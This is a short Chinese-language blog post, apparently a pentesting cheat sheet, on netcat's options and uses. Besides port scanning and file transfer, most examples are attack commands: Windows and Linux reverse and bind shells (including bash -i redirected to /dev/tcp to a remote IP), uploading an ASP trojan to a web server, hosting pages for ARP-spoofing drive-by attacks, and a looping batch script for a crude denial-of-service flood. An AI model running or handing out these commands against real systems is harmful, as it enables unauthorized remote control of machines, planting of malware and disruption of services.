nc的使用方法

发布于 2019-11-18  1259 次阅读


0x01 简介

nc( netcat )被誉为网络中的瑞士军刀,nc的用途和使用方法多种多样。

0x02 参数

-h  查看帮助信息   
-d  后台模式   
-e  prog程序重定向,一但连接就执行[危险]  
-i  secs延时的间隔  
-l  监听模式,用于入站连接   
-L  监听模式,连接天闭后仍然继续监听,直到CTR+C   
-n  IP地址,不能用域名   
-o  film记录16进制的传输   
-p  [空格]端口 本地端口号   
-r  随机本地及远程端口  
-t  使用Telnet交互方式   
-u  UDP模式  
-v  详细输出,用-vv将更详细   
-w  数字 timeout延时间隔   
-z  将输入,输出关掉(用于扫锚时)

0x03 使用方法

#扫描端口 
nc.exe -nvv -w2 -z 192.168.199.111 3385-3399 
#Windows反弹shell
nc.exe -lvp 8888                                                   //监听 
nc.exe -t -e cmd.exe 192.168.199.152 8888                          //反弹
#Linux反弹shell
nc -lvp 8888                                           //监听 
bash -i >& /dev/tcp/192.168.199.111/8888 0>&1          //反弹
#做蜜罐,不停地监听3389端口,把结果输出到c:\log.txt  
nc -L -p 3389>c:\log.txt
#监听3389端口,并把payload.txt中的内容发给连接本端口的主机,可起到传送文件作用.(此用法常用于反向溢出) 
nc -L -p 3389<c:\payload.txt
#绑定主机的cmd到8888端口,并以TELNET方式应答
nc -l -p 8888 -t -e cmd.exe
绑定cmd反向连接192.168.199.111的888端口以TELNET方式应答
nc -t -e cmd.exe 192.168.199.111 888
#上传ASP木马
nc -vv www.xx.com 80<xx.asp
#向192.168.0.1发送1.txt中的内容
nc -nvv 192.168.199.111 80<1.txt
#NC架设简单的HTTP服务器
nc -l -p 80<index.html  //index.htm为主页文件
<--
注:此法只能架设简单的HTTP服务器,只有一个主页页面,多人访问还会假死。
所以只能玩玩用。(但是此法经常用于局域网ARP欺骗挂马架设简易HTTP)
-->
#利用NC进行DDOS攻击
nc -vv www.xxx.com 80<1.txt    //1.txt中为垃圾信息
<--
注:可以简单的用一个批处理实现循环攻击
    @echo off  
    color a  
    :1  
    cls  
    nc -vv www.xxx.com 80<1.txt  
    goto 1 
-->
  • 因为windows和Linux的编码不同,这里有些乱码
  • 可以通过( chcp 65001 )修改过来

我不懂世界到底在热闹些什么